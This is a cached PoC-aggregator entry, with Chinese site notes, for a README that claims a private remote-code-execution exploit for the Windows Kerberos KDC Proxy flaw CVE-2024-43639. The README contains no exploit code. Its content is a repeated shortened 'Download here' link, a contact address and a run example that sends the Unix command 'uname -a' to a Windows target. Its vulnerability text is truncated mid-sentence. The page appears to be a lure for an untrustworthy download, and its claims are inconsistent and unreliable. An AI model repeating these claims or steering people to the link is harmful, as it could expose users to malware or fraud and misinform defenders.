POC详情: 95be2c95eb140554ca0da198d82d54c33912bd14

来源
关联漏洞
标题: Microsoft Windows Kerberos 安全漏洞 (CVE-2024-43639)
描述:Microsoft Windows Kerberos是美国微软(Microsoft)公司的一个用于在网络集群中进行身份验证的软件。Kerberos 同时作为一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。 Microsoft Windows Kerberos存在安全漏洞。攻击者利用该漏洞可以远程执行代码。以下产品和版本受到影响:Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation
介绍
# CVE-2024-43639 Windows KDC Proxy Remote Code Execution Vulnerability


## Overview
CVE-2024-43639

Authentication system and use of RCE in Windows Server 2012, 2016, 2019, 2022, 2025 ( Server Core included)
   
## Exploit:
### [Download here](https://bit.ly/48YH7Wb)

## Details

- **CVE ID**: [CVE-2024-43639](https://nvd.nist.gov/vuln/detail/CVE-2024-43639)
- **Published**: 2024-11-12
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8

## Vulnerability Description

CVE-2024-43639 is a critical vulnerability in the 

This vulnerability has been assigned the CVSS 3 score of 9.8/10. The vulnerability allows an unauthenticated attacker to use a specially crafted application to leverage a cryptographic protocol vulnerability in Windows  to perform remote code execution against the target. This process does not require any user interaction and there are no workarounds to mitigate this vulnerability.

## Affected Versions

**Windows Server 2012, 2016, 2019, 2022, 2025 ( Server Core included)**

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **exploitsecure@exploit.in**

## Exploit:
### [Download here](https://bit.ly/48YH7Wb)



文件快照

[4.0K] /data/pocs/95be2c95eb140554ca0da198d82d54c33912bd14 └── [1.3K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。